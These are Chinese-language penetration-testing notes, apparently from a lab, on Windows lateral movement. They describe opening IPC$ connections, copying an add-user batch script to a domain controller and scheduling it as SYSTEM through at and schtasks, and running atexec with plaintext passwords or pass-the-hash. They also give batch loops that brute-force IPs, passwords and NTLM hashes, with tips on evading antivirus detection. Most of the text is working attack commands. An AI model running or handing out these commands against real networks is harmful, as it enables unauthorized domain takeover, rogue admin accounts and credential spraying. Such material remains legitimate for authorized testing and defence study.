at命令
使用限制是当前操作系统版本小于2012
先建立一个连接
net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator # 建立 ipc 连接
复制添加用户的批处理脚本到域控的C盘下
copy add.bat \\192.168.30.7\c$
at \\192.168.3.21 15:47 c:\add.bat #添加计划任务
写添加账户命令的时候要注意密码规则
有可能会因为密码不符合规则或者密码太长导致命令执行失败
schtasks命令
适用于大于等于2012的操作系统
也是和at命令一样建立ipc连接 然后上传adduser的bat脚本到目标机器C盘下
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务
对应执行文件
如果一直没有响应可能是IP错了
schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务
schtasks /delete /s 192.168.3.21 /tn adduser /f #删除 adduser 任务
atexec 第三方工具
缺点:如果目标机器有安全狗或者其他的waf容易被查杀报警 需要做免杀 没有Windows自带的工具好 有点就是功能多 有回显
atexec.exe ./administrator:wsnd1593..WSND@192.168.30.7 "ipconfig"
也可以用hash连接
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"
hhash可以用mimikatz获取
批量检测明文或hash
这个应该算是爆破了吧
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量检测 IP 对应明文
连接
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测 IP 对应明文
回显版
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #批量检测明文对应 IP
回显版
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #批量检测
HASH 对应 IP 回显版
也可以用python写爆破的脚本 然后打包成exe可以免py环境运行
